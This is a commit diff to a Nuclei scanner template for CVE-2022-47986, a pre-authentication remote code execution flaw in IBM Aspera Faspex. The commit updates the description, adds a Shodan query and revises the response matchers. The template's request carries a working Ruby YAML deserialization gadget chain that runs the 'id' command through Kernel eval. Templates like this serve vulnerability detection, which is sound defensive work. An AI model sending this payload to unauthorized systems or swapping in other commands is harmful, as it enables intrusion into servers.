fix matcher and template

2023-02-03 15:04:07 +05:30 · 2023-02-03 15:04:07 +05:30 · d6bc1f9827
parent 47b3fc6743
commit d6bc1f9827
1 changed files with 17 additions and 8 deletions
--- a/cves/2022/CVE-2022-47986.yaml
+++ b/cves/2022/CVE-2022-47986.yaml
@ -4,7 +4,8 @@ info:
  name: Pre-Auth RCE in Aspera Faspex
  author: coldfish
  severity: critical
-  description: A critical pre-authentication RCE vulnerability in IBM Aspera Faspex.
+  description: |
+    IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.
  reference:
    - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/
    - https://www.ibm.com/support/pages/node/6952319
@ -13,7 +14,10 @@ info:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-47986
-  tags: cve,cve2022,ibm,Aspera_Faspex,aspera,faspex
+  metadata:
+    verified: "true"
+    shodan-query: html:"Aspera Faspex"
+  tags: cve,cve2022,ibm,aspera,faspex

 requests:
  - raw:
@ -25,12 +29,17 @@ requests:

        {"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n    i: x\n- !ruby/object:Gem::SpecFetcher\n    i: y\n- !ruby/object:Gem::Requirement\n  requirements:\n    !ruby/object:Gem::Package::TarReader\n    io: &1 !ruby/object:Net::BufferedIO\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\n         read: 0\n         header: \"pew\"\n      debug_output: &1 !ruby/object:Net::WriteAdapter\n         socket: &1 !ruby/object:PrettyPrint\n             output: !ruby/object:Net::WriteAdapter\n                 socket: &1 !ruby/module \"Kernel\"\n                 method_id: :eval\n             newline: \"throw `id`\"\n             buffer: {}\n             group_stack:\n              - !ruby/object:PrettyPrint::Group\n                break: true\n         method_id: :breakable\n", "package_name": "assetnote_pack", "package_note": "hello from assetnote team", "original_sender_name": "assetnote", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "assetnote", "delivery_title": "TEST", "delivery_note": "TEST", "delete_after_download": true, "delete_after_download_condition": "IDK"}

+    matchers-condition: and
    matchers:
+      - type: regex
+        regex:
+          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
+
      - type: word
-        part: body
+        part: header
        words:
-          - "uid="
-          - "gid="
-          - "groups="
-          - "uncaught throw"
-        condition: and
+          - "text/html"
+
+      - type: status
+        status:
+          - 500